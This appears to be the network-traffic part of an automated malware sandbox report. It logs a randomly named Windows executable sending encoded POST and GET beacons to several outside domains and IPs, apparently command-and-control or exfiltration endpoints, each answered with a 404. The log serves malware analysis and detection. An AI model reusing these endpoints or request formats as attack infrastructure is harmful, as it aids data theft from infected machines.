                                                      23192.168.2.44976546.30.211.38803716C:\Program Files (x86)\dBFhdyqBsdNrnrJAfNLOKXKaQnhKQJBcldNsIfNpUQtMCDpaQGBzTrWGWqXfCiiJiSX\akwoJPEqdiyPQmCnaGzo.exe
                                                      TimestampBytes transferredDirectionData
                                                      Jul 3, 2024 17:46:03.482319117 CEST10790OUTPOST /735n/ HTTP/1.1
                                                      Host: www.monchosoft.com
                                                      Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
                                                      Accept-Language: en-us
                                                      Accept-Encoding: gzip, deflate, br
                                                      Cache-Control: no-cache
                                                      Content-Length: 10305
                                                      Connection: close
                                                      Content-Type: application/x-www-form-urlencoded
                                                      Origin: http://www.monchosoft.com
                                                      Referer: http://www.monchosoft.com/735n/
                                                      User-Agent: Mozilla/5.0 (Windows NT 6.3; Win64; x64; Trident/7.0; rv:11.0) like Gecko
                                                      Data Raw: 6c 78 52 6c 76 54 53 68 3d 48 4c 6f 46 47 52 2b 51 34 47 47 4a 41 63 32 64 41 51 75 33 36 54 49 4e 4e 7a 43 7a 66 6d 62 77 77 64 6a 46 34 38 6e 68 55 38 4f 6d 66 72 71 50 70 73 66 7a 51 2b 4b 30 6d 63 63 54 48 67 64 75 4b 2b 77 51 57 71 71 6e 72 66 52 2f 34 6f 36 6d 59 4c 56 6e 4e 4c 34 38 4f 56 74 45 4b 70 62 63 72 39 32 46 44 63 46 6f 7a 30 2f 33 32 37 74 79 49 64 4c 6e 49 59 6f 53 56 58 35 7a 67 43 77 56 56 75 57 57 61 2f 63 63 48 6c 44 76 46 36 33 66 70 41 51 48 43 77 4b 70 54 62 61 5a 52 45 4e 64 4c 44 6a 79 55 68 32 43 50 33 46 74 31 37 2f 75 51 41 44 38 4c 76 4b 6f 50 54 48 43 34 78 68 58 44 2f 32 74 30 66 36 4f 6d 51 73 66 79 57 64 76 6d 43 75 39 32 67 6b 54 65 64 4a 33 56 53 46 58 55 72 35 32 42 7a 51 48 35 4e 43 57 48 46 31 41 5a 75 57 4c 38 35 35 6d 50 6e 2f 2b 6c 35 78 6a 2b 49 4a 4a 6d 36 6c 36 7a 2f 38 6d 68 32 48 32 55 5a 4e 57 50 6a 4a 2f 69 72 4f 48 77 70 4c 4a 43 47 35 75 54 4c 4b 4f 4a 6d 49 4a 47 30 31 42 68 2f 51 6e 53 54 4f 73 63 72 66 56 54 6f 32 72 6e 7a 6b 6d 58 45 31 52 49 [TRUNCATED]
                                                      Data Ascii: lxRlvTSh=HLoFGR+Q4GGJAc2dAQu36TINNzCzfmbwwdjF48nhU8OmfrqPpsfzQ+K0mccTHgduK+wQWqqnrfR/4o6mYLVnNL48OVtEKpbcr92FDcFoz0/327tyIdLnIYoSVX5zgCwVVuWWa/ccHlDvF63fpAQHCwKpTbaZRENdLDjyUh2CP3Ft17/uQAD8LvKoPTHC4xhXD/2t0f6OmQsfyWdvmCu92gkTedJ3VSFXUr52BzQH5NCWHF1AZuWL855mPn/+l5xj+IJJm6l6z/8mh2H2UZNWPjJ/irOHwpLJCG5uTLKOJmIJG01Bh/QnSTOscrfVTo2rnzkmXE1RIhBHn+QAKPaLUF+c3UDvE5CzCZpB53xdOEOYafwAgBeJW/L6tUI+J36uuWJdEc/8YGRSFW7Q5qDfNGwDQU+ecA/x+av0seYMYAjVZHEhis9fkzu0tQSCsiOK++q11OdfqDyvLZIX/Qcyx9l/WEEXMV7wHYDM/MyWkEJRCgLzpJ8ZXjbUdSVFNTGwDS+eE3aQ9UNaR13//iqO0sMKYsdhwkNRqgmLlyLBPS/I9yZ2NZF4fdlQzktrn+jhJRJM8KJ6oD9mAMsm+z7y+fg+3jGZ3LvbwOOjb7ohseBnmw46+z3ZD1tow+9a7wxW3iHoZLo9rypcQ0kz22/hBNMcBkEJy+u7xsGxA2o6UgJXGzmS196yyge9mRtgmBuvBPI1VZHIVG1/N+dFhg2eQzWdmzPAIL03lSNu2m0GN8melVLw6FoeMh45lgYXuKVRoUZ95dbIaIY3yEc5nnqIEyf7Et26Foxmy/yRAOray/72YgSJ3E8qQYYyeLKbrCxAkSzexn6z7rKstgt4h0uxT122u2PxN0q5p0g96P33cC61xUqCJ+PPZM7q/MC0eA1mQYoHtDjOSzvZmJ//Q9RGg2hoj416obmBef7xjCTwFwKQWvSMGV0YiAG7iL6evvTsDOZt3tfIKmc1vxgRyiFps6nBu6n78QJ6mTQRf1iAaKI [TRUNCATED]
                                                      Jul 3, 2024 17:46:04.111865044 CEST336INHTTP/1.1 404 Not Found
                                                      Server: nginx/1.18.0 (Ubuntu)
                                                      Date: Wed, 03 Jul 2024 15:46:04 GMT
                                                      Content-Type: text/html; charset=UTF-8
                                                      Content-Length: 162
                                                      Connection: close
                                                      Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 2f 31 2e 31 38 2e 30 20 28 55 62 75 6e 74 75 29 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a
                                                      Data Ascii: <html><head><title>404 Not Found</title></head><body><center><h1>404 Not Found</h1></center><hr><center>nginx/1.18.0 (Ubuntu)</center></body></html>


                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                      24192.168.2.44976646.30.211.38803716C:\Program Files (x86)\dBFhdyqBsdNrnrJAfNLOKXKaQnhKQJBcldNsIfNpUQtMCDpaQGBzTrWGWqXfCiiJiSX\akwoJPEqdiyPQmCnaGzo.exe
                                                      TimestampBytes transferredDirectionData
                                                      Jul 3, 2024 17:46:06.017992020 CEST418OUTGET /735n/?lxRlvTSh=KJAlFkGNwGXoK9jXB03h4jJMHTy8Y0+g9t3JgJmyeOCBT/uylrmuLZmon7piRwxkAvV6Iq7XsIFI/+KtRdw7O50MagBKJtHJjM3XcudO1Duzw6d1NcP9VI8=&kh=9PxLvhoHS4 HTTP/1.1
                                                      Host: www.monchosoft.com
                                                      Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
                                                      Accept-Language: en-us
                                                      Connection: close
                                                      User-Agent: Mozilla/5.0 (Windows NT 6.3; Win64; x64; Trident/7.0; rv:11.0) like Gecko
                                                      Jul 3, 2024 17:46:06.659269094 CEST336INHTTP/1.1 404 Not Found
                                                      Server: nginx/1.18.0 (Ubuntu)
                                                      Date: Wed, 03 Jul 2024 15:46:06 GMT
                                                      Content-Type: text/html; charset=UTF-8
                                                      Content-Length: 162
                                                      Connection: close
                                                      Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 2f 31 2e 31 38 2e 30 20 28 55 62 75 6e 74 75 29 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a
                                                      Data Ascii: <html><head><title>404 Not Found</title></head><body><center><h1>404 Not Found</h1></center><hr><center>nginx/1.18.0 (Ubuntu)</center></body></html>


                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                      25192.168.2.449767217.160.0.87803716C:\Program Files (x86)\dBFhdyqBsdNrnrJAfNLOKXKaQnhKQJBcldNsIfNpUQtMCDpaQGBzTrWGWqXfCiiJiSX\akwoJPEqdiyPQmCnaGzo.exe
                                                      TimestampBytes transferredDirectionData
                                                      Jul 3, 2024 17:46:11.707701921 CEST709OUTPOST /4h78/ HTTP/1.1
                                                      Host: www.theweekendcreator.com
                                                      Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
                                                      Accept-Language: en-us
                                                      Accept-Encoding: gzip, deflate, br
                                                      Cache-Control: no-cache
                                                      Content-Length: 205
                                                      Connection: close
                                                      Content-Type: application/x-www-form-urlencoded
                                                      Origin: http://www.theweekendcreator.com
                                                      Referer: http://www.theweekendcreator.com/4h78/
                                                      User-Agent: Mozilla/5.0 (Windows NT 6.3; Win64; x64; Trident/7.0; rv:11.0) like Gecko
                                                      Data Raw: 6c 78 52 6c 76 54 53 68 3d 57 56 75 62 59 38 49 42 63 4d 67 53 43 66 63 41 62 6b 50 34 36 38 76 79 6b 31 52 47 6a 4f 45 65 4b 4b 7a 75 58 76 44 4b 67 6c 38 45 45 66 73 50 66 33 47 71 55 74 66 36 6c 63 65 56 6e 6f 59 67 45 42 74 53 57 56 7a 35 71 70 4a 38 4c 4e 41 42 73 6e 54 45 79 51 79 53 42 63 2f 43 64 70 66 46 72 55 59 65 79 34 74 53 6f 71 75 6b 47 55 32 64 63 74 6f 69 75 49 6e 2b 59 75 6c 4e 5a 65 5a 45 43 46 33 4b 56 36 41 71 49 31 33 7a 4f 4b 47 48 69 57 56 76 72 4a 34 5a 47 61 5a 63 4c 4f 39 68 67 79 4c 44 59 38 6e 63 6f 7a 54 76 34 6a 62 4d 35 72 51 31 32 35 4b 6d 37 33 65 67 74 68 58 30 76 77 3d 3d
                                                      Data Ascii: lxRlvTSh=WVubY8IBcMgSCfcAbkP468vyk1RGjOEeKKzuXvDKgl8EEfsPf3GqUtf6lceVnoYgEBtSWVz5qpJ8LNABsnTEyQySBc/CdpfFrUYey4tSoqukGU2dctoiuIn+YulNZeZECF3KV6AqI13zOKGHiWVvrJ4ZGaZcLO9hgyLDY8ncozTv4jbM5rQ125Km73egthX0vw==
                                                      Jul 3, 2024 17:46:12.345635891 CEST580INHTTP/1.1 404 Not Found
                                                      Content-Type: text/html
                                                      Transfer-Encoding: chunked
                                                      Connection: close
                                                      Date: Wed, 03 Jul 2024 15:46:12 GMT
                                                      Server: Apache
                                                      Content-Encoding: gzip
                                                      Data Raw: 31 38 39 0d 0a 1f 8b 08 00 00 00 00 00 00 03 7d 51 4b 4f e3 30 10 be f7 57 cc 7a 0f 9c 1c 37 94 43 9b 26 1c b6 ad b4 48 85 45 28 88 e5 68 62 b7 b1 e4 78 82 33 21 0d bf 1e 27 e5 b1 20 b4 27 8f ed ef 31 f3 4d fa 63 fd 67 95 df 5f 6f a0 a4 ca c2 f5 ed af ed c5 0a 18 17 e2 6e b6 12 62 9d af e1 ef ef fc 72 0b 71 34 85 dc 4b d7 18 32 e8 a4 15 62 73 c5 26 ac 24 aa 13 21 ba ae 8b ba 59 84 7e 2f f2 1b 71 18 b4 e2 81 fc 5a 72 fa 87 19 29 52 ec 7c 92 8e 86 56 ba 7d c6 b4 63 70 a8 6c f2 e9 e6 9a ec 1b f9 78 b1 58 1c 55 83 06 a4 a5 96 2a 9c 90 92 21 ab 87 0a 36 de a3 87 b3 e9 19 70 b8 42 82 1d b6 4e 0d 10 f1 8e 49 2b 4d 12 0a 74 a4 1d 65 8c f4 81 c4 d0 ce 12 8a 52 fa 46 53 d6 d2 8e cf 59 08 85 6a ae 1f 5b f3 94 b1 d5 11 ce f3 be d6 83 37 7c 51 71 c8 0b 59 94 fa 33 6b 7c e2 83 95 47 3b b6 2c 5e 7b 4e 1f 50 f5 d0 50 6f 75 c6 76 01 c0 77 b2 32 b6 4f a4 37 d2 2e 8f 16 65 fc 86 28 d0 a2 4f 7e 4e e5 ec 74 5e 2c 47 7c 63 9e 75 12 16 a3 ab 23 fa 3f a3 97 f1 d8 71 fd a6 f6 c1 9f 46 f3 77 fe 3d b6 1e 1e 3c 76 8d f6 50 48 [TRUNCATED]
                                                      Data Ascii: 189}QKO0Wz7C&HE(hbx3!' '1Mcg_onbrq4K2bs&$!Y~/qZr)R|V}cplxXU*!6pBNI+MteRFSYj[7|QqY3k|G;,^{NPPouvw2O7.e(O~Nt^,G|cu#?qFw=<vPHw3Nmy2nzlB8`a1l`mur0


                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                      26192.168.2.449768217.160.0.87803716C:\Program Files (x86)\dBFhdyqBsdNrnrJAfNLOKXKaQnhKQJBcldNsIfNpUQtMCDpaQGBzTrWGWqXfCiiJiSX\akwoJPEqdiyPQmCnaGzo.exe
                                                      TimestampBytes transferredDirectionData
                                                      Jul 3, 2024 17:46:14.252979040 CEST729OUTPOST /4h78/ HTTP/1.1
                                                      Host: www.theweekendcreator.com
                                                      Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
                                                      Accept-Language: en-us
                                                      Accept-Encoding: gzip, deflate, br
                                                      Cache-Control: no-cache
                                                      Content-Length: 225
                                                      Connection: close
                                                      Content-Type: application/x-www-form-urlencoded
                                                      Origin: http://www.theweekendcreator.com
                                                      Referer: http://www.theweekendcreator.com/4h78/
                                                      User-Agent: Mozilla/5.0 (Windows NT 6.3; Win64; x64; Trident/7.0; rv:11.0) like Gecko
                                                      Data Raw: 6c 78 52 6c 76 54 53 68 3d 57 56 75 62 59 38 49 42 63 4d 67 53 43 37 59 41 58 6c 50 34 74 73 76 78 34 46 52 47 6f 75 45 61 4b 4b 33 75 58 72 37 61 67 57 55 45 45 36 6f 50 65 7a 53 71 56 74 66 36 75 38 65 51 71 49 59 52 45 42 6f 6c 57 55 50 35 71 76 6c 38 4c 4e 77 42 73 30 4c 46 7a 41 79 51 55 4d 2f 41 54 4a 66 46 72 55 59 65 79 34 6f 4a 6f 72 47 6b 47 6b 47 64 62 38 6f 6a 6d 6f 6e 35 66 75 6c 4e 55 2b 5a 59 43 46 33 34 56 37 4d 41 49 32 50 7a 4f 4c 32 48 69 6b 78 73 67 4a 35 63 4c 36 59 32 4b 38 39 6c 35 77 4f 35 46 63 76 44 76 77 62 30 39 6c 4b 57 6f 61 78 69 6b 35 75 56 6d 77 58 55 67 69 71 39 30 2f 54 47 4d 58 54 63 31 72 34 2f 63 32 48 52 42 51 44 68 6e 54 49 3d
                                                      Data Ascii: lxRlvTSh=WVubY8IBcMgSC7YAXlP4tsvx4FRGouEaKK3uXr7agWUEE6oPezSqVtf6u8eQqIYREBolWUP5qvl8LNwBs0LFzAyQUM/ATJfFrUYey4oJorGkGkGdb8ojmon5fulNU+ZYCF34V7MAI2PzOL2HikxsgJ5cL6Y2K89l5wO5FcvDvwb09lKWoaxik5uVmwXUgiq90/TGMXTc1r4/c2HRBQDhnTI=
                                                      Jul 3, 2024 17:46:14.895241022 CEST580INHTTP/1.1 404 Not Found
                                                      Content-Type: text/html
                                                      Transfer-Encoding: chunked
                                                      Connection: close
                                                      Date: Wed, 03 Jul 2024 15:46:14 GMT
                                                      Server: Apache
                                                      Content-Encoding: gzip
                                                      Data Raw: 31 38 39 0d 0a 1f 8b 08 00 00 00 00 00 00 03 7d 51 4b 4f e3 30 10 be f7 57 cc 7a 0f 9c 1c 37 94 43 9b 26 1c b6 ad b4 48 85 45 28 88 e5 68 62 b7 b1 e4 78 82 33 21 0d bf 1e 27 e5 b1 20 b4 27 8f ed ef 31 f3 4d fa 63 fd 67 95 df 5f 6f a0 a4 ca c2 f5 ed af ed c5 0a 18 17 e2 6e b6 12 62 9d af e1 ef ef fc 72 0b 71 34 85 dc 4b d7 18 32 e8 a4 15 62 73 c5 26 ac 24 aa 13 21 ba ae 8b ba 59 84 7e 2f f2 1b 71 18 b4 e2 81 fc 5a 72 fa 87 19 29 52 ec 7c 92 8e 86 56 ba 7d c6 b4 63 70 a8 6c f2 e9 e6 9a ec 1b f9 78 b1 58 1c 55 83 06 a4 a5 96 2a 9c 90 92 21 ab 87 0a 36 de a3 87 b3 e9 19 70 b8 42 82 1d b6 4e 0d 10 f1 8e 49 2b 4d 12 0a 74 a4 1d 65 8c f4 81 c4 d0 ce 12 8a 52 fa 46 53 d6 d2 8e cf 59 08 85 6a ae 1f 5b f3 94 b1 d5 11 ce f3 be d6 83 37 7c 51 71 c8 0b 59 94 fa 33 6b 7c e2 83 95 47 3b b6 2c 5e 7b 4e 1f 50 f5 d0 50 6f 75 c6 76 01 c0 77 b2 32 b6 4f a4 37 d2 2e 8f 16 65 fc 86 28 d0 a2 4f 7e 4e e5 ec 74 5e 2c 47 7c 63 9e 75 12 16 a3 ab 23 fa 3f a3 97 f1 d8 71 fd a6 f6 c1 9f 46 f3 77 fe 3d b6 1e 1e 3c 76 8d f6 50 48 [TRUNCATED]
                                                      Data Ascii: 189}QKO0Wz7C&HE(hbx3!' '1Mcg_onbrq4K2bs&$!Y~/qZr)R|V}cplxXU*!6pBNI+MteRFSYj[7|QqY3k|G;,^{NPPouvw2O7.e(O~Nt^,G|cu#?qFw=<vPHw3Nmy2nzlB8`a1l`mur0


                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                      27192.168.2.449769217.160.0.87803716C:\Program Files (x86)\dBFhdyqBsdNrnrJAfNLOKXKaQnhKQJBcldNsIfNpUQtMCDpaQGBzTrWGWqXfCiiJiSX\akwoJPEqdiyPQmCnaGzo.exe
                                                      TimestampBytes transferredDirectionData
                                                      Jul 3, 2024 17:46:16.794879913 CEST10811OUTPOST /4h78/ HTTP/1.1
                                                      Host: www.theweekendcreator.com
                                                      Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
                                                      Accept-Language: en-us
                                                      Accept-Encoding: gzip, deflate, br
                                                      Cache-Control: no-cache
                                                      Content-Length: 10305
                                                      Connection: close
                                                      Content-Type: application/x-www-form-urlencoded
                                                      Origin: http://www.theweekendcreator.com
                                                      Referer: http://www.theweekendcreator.com/4h78/
                                                      User-Agent: Mozilla/5.0 (Windows NT 6.3; Win64; x64; Trident/7.0; rv:11.0) like Gecko
                                                      Data Raw: 6c 78 52 6c 76 54 53 68 3d 57 56 75 62 59 38 49 42 63 4d 67 53 43 37 59 41 58 6c 50 34 74 73 76 78 34 46 52 47 6f 75 45 61 4b 4b 33 75 58 72 37 61 67 57 4d 45 46 49 67 50 66 55 75 71 45 64 66 36 68 73 65 52 71 49 59 32 45 42 51 70 57 55 44 50 71 71 35 38 4b 73 51 42 35 78 6e 46 36 41 79 51 4c 38 2f 42 64 70 65 64 72 55 49 61 79 34 59 4a 6f 72 47 6b 47 6d 65 64 49 4e 6f 6a 67 6f 6e 2b 59 75 6c 42 5a 65 5a 6b 43 45 54 6f 56 37 49 36 49 48 76 7a 4f 72 6d 48 79 48 56 73 70 4a 35 65 4d 36 59 75 4b 38 77 37 35 77 53 45 46 64 72 6c 76 33 62 30 77 68 6a 4b 34 37 52 68 6d 6f 4b 75 37 43 58 54 6c 67 57 37 77 74 58 78 64 33 7a 6a 6f 71 4e 55 65 78 6d 5a 51 44 4c 4a 35 46 77 2b 56 50 55 77 59 44 67 67 70 4b 35 71 6b 65 58 51 67 32 73 4f 67 53 41 45 32 61 69 36 36 6d 6d 49 47 61 6b 48 59 64 4a 5a 5a 43 59 35 55 67 75 4a 31 4c 68 34 58 51 33 43 32 5a 67 52 50 56 4f 74 53 71 79 75 64 32 66 47 44 4a 56 68 35 55 4f 5a 4d 56 73 65 43 6a 6e 43 63 58 51 48 61 36 55 57 4d 6e 50 50 62 4c 4d 4c 65 30 4b 61 45 72 30 6b 6e [TRUNCATED]
                                                      Data Ascii: lxRlvTSh=WVubY8IBcMgSC7YAXlP4tsvx4FRGouEaKK3uXr7agWMEFIgPfUuqEdf6hseRqIY2EBQpWUDPqq58KsQB5xnF6AyQL8/BdpedrUIay4YJorGkGmedINojgon+YulBZeZkCEToV7I6IHvzOrmHyHVspJ5eM6YuK8w75wSEFdrlv3b0whjK47RhmoKu7CXTlgW7wtXxd3zjoqNUexmZQDLJ5Fw+VPUwYDggpK5qkeXQg2sOgSAE2ai66mmIGakHYdJZZCY5UguJ1Lh4XQ3C2ZgRPVOtSqyud2fGDJVh5UOZMVseCjnCcXQHa6UWMnPPbLMLe0KaEr0kntKRb3S4oU05wMpAP/6ZiajZq6ryBOhg6qzlgchomi8IHJ8XTPFZSKHDKbYj7WN5qXOzlqv95thC1GIrEbyGE6Wyeau5ARkV78h0BPbtyVAuEXkfloWmaUwy8F0YX5xGWSK0UeFXv2Ufyla9z+JCqjFW+jH3M94v7nvbTtUapMDrgpXios3CV9UkL+DRRBqhtNGdV/1lWg/WVg/0h1E5qixGpgwEsTHfqc0Tq/Zohy1mPuAirToCn4hSNKEq/rzK4emnxgBZDrf9LTlVIhQWG1EpWJ2dTNjLY0RWaAcR6DX+i1+y47RyRVjRONin8Dz1Srab1IHKG1nEXF71dPy0NibQzjhfYuMyyqw8U+2/iy7IMhnLYpAEASTou3wV5Sw1vnKKDR6eiTlWwi/6UGmJWlAJ1bfutmMQ0AMiYjaPvEiPgFfVcN71zS+OFO/zvAToHhrZiJnx3s5iwKfKhOwvCbZVaZLcE72n6ceSaggxZ7d0AFNZsQNNdMBn/k+BKtinDxYmkE+H/lZuaCynuTMUQb5Dykwka0UGVDYhWjZ+6XiXBj7dT3DHbrs4iOneZaNAxKx3ZNP5PIoOl27Zo74GWFslncVr9ybFwU2JCvBearqSd62d2NO1nQMAOGF+2kIHDDB2j+rcUFRTIE3lI5g4aWPbYMIruPrc5FK [TRUNCATED]
                                                      Jul 3, 2024 17:46:17.549436092 CEST580INHTTP/1.1 404 Not Found
                                                      Content-Type: text/html
                                                      Transfer-Encoding: chunked
                                                      Connection: close
                                                      Date: Wed, 03 Jul 2024 15:46:17 GMT
                                                      Server: Apache
                                                      Content-Encoding: gzip
                                                      Data Raw: 31 38 39 0d 0a 1f 8b 08 00 00 00 00 00 00 03 7d 51 4b 4f e3 30 10 be f7 57 cc 7a 0f 9c 1c 37 94 43 9b 26 1c b6 ad b4 48 85 45 28 88 e5 68 62 b7 b1 e4 78 82 33 21 0d bf 1e 27 e5 b1 20 b4 27 8f ed ef 31 f3 4d fa 63 fd 67 95 df 5f 6f a0 a4 ca c2 f5 ed af ed c5 0a 18 17 e2 6e b6 12 62 9d af e1 ef ef fc 72 0b 71 34 85 dc 4b d7 18 32 e8 a4 15 62 73 c5 26 ac 24 aa 13 21 ba ae 8b ba 59 84 7e 2f f2 1b 71 18 b4 e2 81 fc 5a 72 fa 87 19 29 52 ec 7c 92 8e 86 56 ba 7d c6 b4 63 70 a8 6c f2 e9 e6 9a ec 1b f9 78 b1 58 1c 55 83 06 a4 a5 96 2a 9c 90 92 21 ab 87 0a 36 de a3 87 b3 e9 19 70 b8 42 82 1d b6 4e 0d 10 f1 8e 49 2b 4d 12 0a 74 a4 1d 65 8c f4 81 c4 d0 ce 12 8a 52 fa 46 53 d6 d2 8e cf 59 08 85 6a ae 1f 5b f3 94 b1 d5 11 ce f3 be d6 83 37 7c 51 71 c8 0b 59 94 fa 33 6b 7c e2 83 95 47 3b b6 2c 5e 7b 4e 1f 50 f5 d0 50 6f 75 c6 76 01 c0 77 b2 32 b6 4f a4 37 d2 2e 8f 16 65 fc 86 28 d0 a2 4f 7e 4e e5 ec 74 5e 2c 47 7c 63 9e 75 12 16 a3 ab 23 fa 3f a3 97 f1 d8 71 fd a6 f6 c1 9f 46 f3 77 fe 3d b6 1e 1e 3c 76 8d f6 50 48 [TRUNCATED]
                                                      Data Ascii: 189}QKO0Wz7C&HE(hbx3!' '1Mcg_onbrq4K2bs&$!Y~/qZr)R|V}cplxXU*!6pBNI+MteRFSYj[7|QqY3k|G;,^{NPPouvw2O7.e(O~Nt^,G|cu#?qFw=<vPHw3Nmy2nzlB8`a1l`mur0


                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                      28192.168.2.449770217.160.0.87803716C:\Program Files (x86)\dBFhdyqBsdNrnrJAfNLOKXKaQnhKQJBcldNsIfNpUQtMCDpaQGBzTrWGWqXfCiiJiSX\akwoJPEqdiyPQmCnaGzo.exe
                                                      TimestampBytes transferredDirectionData
                                                      Jul 3, 2024 17:46:19.333043098 CEST425OUTGET /4h78/?lxRlvTSh=bXG7bLU8VpdhFuw8OEWepvz+lmtIgfU4QefCRLOwt0xUHukcXkmHP9rgqbjL97YnLUFJGTOXt4l1DZESwR3Y2jPuWZfGScD+gHNftK8/3r/KPWW9Eddz3K4=&kh=9PxLvhoHS4 HTTP/1.1
                                                      Host: www.theweekendcreator.com
                                                      Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
                                                      Accept-Language: en-us
                                                      Connection: close
                                                      User-Agent: Mozilla/5.0 (Windows NT 6.3; Win64; x64; Trident/7.0; rv:11.0) like Gecko
                                                      Jul 3, 2024 17:46:19.975766897 CEST770INHTTP/1.1 404 Not Found
                                                      Content-Type: text/html
                                                      Content-Length: 626
                                                      Connection: close
                                                      Date: Wed, 03 Jul 2024 15:46:19 GMT
                                                      Server: Apache
                                                      Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 57 33 43 2f 2f 44 54 44 20 58 48 54 4d 4c 20 31 2e 30 20 54 72 61 6e 73 69 74 69 6f 6e 61 6c 2f 2f 45 4e 22 0a 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 54 52 2f 78 68 74 6d 6c 31 2f 44 54 44 2f 78 68 74 6d 6c 31 2d 74 72 61 6e 73 69 74 69 6f 6e 61 6c 2e 64 74 64 22 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 22 20 78 6d 6c 3a 6c 61 6e 67 3d 22 65 6e 22 20 78 6d 6c 6e 73 3d 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 31 39 39 39 2f 78 68 74 6d 6c 22 3e 0a 20 3c 68 65 61 64 3e 0a 20 20 3c 74 69 74 6c 65 3e 0a 20 20 20 45 72 72 6f 72 20 34 30 34 20 2d 20 4e 6f 74 20 66 6f 75 6e 64 0a 20 20 3c 2f 74 69 74 6c 65 3e 0a 20 20 3c 6d 65 74 61 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 75 74 66 2d 38 22 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 3e 0a 20 20 3c 6d 65 74 61 20 63 6f 6e 74 65 6e 74 3d 22 6e 6f 2d 63 61 63 68 [TRUNCATED]
                                                      Data Ascii: <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN""http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"><html lang="en" xml:lang="en" xmlns="http://www.w3.org/1999/xhtml"> <head> <title> Error 404 - Not found </title> <meta content="text/html; charset=utf-8" http-equiv="Content-Type"> <meta content="no-cache" http-equiv="cache-control"> </head> <body style="font-family:arial;"> <h1 style="color:#0a328c;font-size:1.0em;"> Error 404 - Not found </h1> <p style="font-size:0.8em;"> Your browser can't find the document corresponding to the URL you typed in. </p> </body></html>


                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                      29192.168.2.44977184.32.84.32803716C:\Program Files (x86)\dBFhdyqBsdNrnrJAfNLOKXKaQnhKQJBcldNsIfNpUQtMCDpaQGBzTrWGWqXfCiiJiSX\akwoJPEqdiyPQmCnaGzo.exe
                                                      TimestampBytes transferredDirectionData
                                                      Jul 3, 2024 17:46:25.079884052 CEST682OUTPOST /hfb9/ HTTP/1.1
                                                      Host: www.saalameh.com
                                                      Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
                                                      Accept-Language: en-us
                                                      Accept-Encoding: gzip, deflate, br
                                                      Cache-Control: no-cache
                                                      Content-Length: 205
                                                      Connection: close
                                                      Content-Type: application/x-www-form-urlencoded
                                                      Origin: http://www.saalameh.com
                                                      Referer: http://www.saalameh.com/hfb9/
                                                      User-Agent: Mozilla/5.0 (Windows NT 6.3; Win64; x64; Trident/7.0; rv:11.0) like Gecko
                                                      Data Raw: 6c 78 52 6c 76 54 53 68 3d 53 79 36 78 56 30 45 52 36 43 67 6a 59 37 30 43 6b 61 75 33 53 61 76 76 6f 4c 37 53 55 78 54 47 79 49 47 2b 74 77 53 4e 63 44 6f 6e 35 77 57 6c 74 50 68 6a 47 39 78 49 49 6e 2b 53 74 62 32 6a 36 76 75 32 63 4e 61 42 6d 70 77 68 2f 69 4a 4d 53 37 77 4c 51 73 37 6c 4a 38 7a 37 31 35 4b 49 6d 47 72 38 34 6f 39 49 39 72 36 79 6f 2b 4b 68 49 65 39 38 67 51 54 31 31 31 76 33 48 58 77 74 6d 37 63 7a 39 4a 72 73 32 57 6e 75 32 2f 57 48 47 5a 62 52 59 32 75 4f 59 76 54 73 48 69 57 37 2b 34 65 4e 76 31 6d 35 71 51 4d 4c 35 37 61 72 6a 43 73 68 77 48 71 73 67 55 38 39 65 34 6a 5a 69 77 3d 3d
